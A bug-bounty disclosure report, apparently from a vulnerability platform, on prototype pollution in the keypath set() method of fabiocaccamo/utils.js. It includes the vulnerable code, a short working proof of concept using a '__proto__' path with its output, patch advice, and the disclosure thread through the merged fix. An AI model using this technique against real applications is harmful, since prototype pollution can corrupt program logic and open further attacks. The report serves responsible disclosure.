Prototype Pollution in fabiocaccamo/utils.js


Reported on

Nov 30th 2021


I discovered a prototype pollution vulnerability via utils.js method analysis.

set: function(obj, path, value)
            var keys = path.split('.');
            var key;
            var cursor = obj;
            for (var i = 0, j = keys.length; i < j; i++) {
                key = keys[i];
                if (!TypeUtil.isObject(cursor[key])) {
                    cursor[key] = {};
                if (i < (j - 1)) {
                    cursor = cursor[key];
                } else {
                    cursor[key] = value;

If you check the set() method of utils.object.keypath, you can see that the value of the path parameter is split with dots, and then merged with the value of the value parameter based on the key value. this means that it can be exploited as a prototype pollution.

const utils = require("@fabiocaccamo/utils.js");
const obj = {};
const fake_obj = {};

console.log(`[+] Before prototype pollution : ${obj.polluted}`);
utils.object.keypath.set(fake_obj, '__proto__.polluted', true);
console.log(`[+] After prototype pollution : ${obj.polluted}`);

[+] Before prototype pollution : undefined
[+] After prototype pollution : true

I wrote PoC as above!

⚡ root@pocas  ~/BugBountyPoC/utils.js  node poc.js
[+] Before prototype pollution : undefined
[+] After prototype pollution : true
⚡ root@pocas  ~/BugBountyPoC/utils.js 

A prototype pollution vulnerability has occurred and you can see the object being polluted. To patch this vulnerability, use the Object.freeze() method or the key value must be verified. (e.g __proto__)


We are processing your report and will contact the fabiocaccamo/utils.js team within 24 hours. 2 months ago
Pocas modified their report
2 months ago
We created a GitHub Issue asking the maintainers to create a 2 months ago
2 months ago


Hello. What should I do within this process?

We have contacted a member of the fabiocaccamo/utils.js team and are waiting to hear back 2 months ago
Fabio Caccamo validated this vulnerability 2 months ago
Pocas has been awarded the disclosure bounty
The fix bounty is now up for grabs
2 months ago


Hello! I confirmed that it has been patched in above commit.

Jamie Slome
2 months ago


@pocas - I have dropped a comment on the commit mentioned above, asking the maintainer to confirm.

Fabio Caccamo confirmed that a fix has been merged on 102efa 2 months ago
Fabio Caccamo has been awarded the fix bounty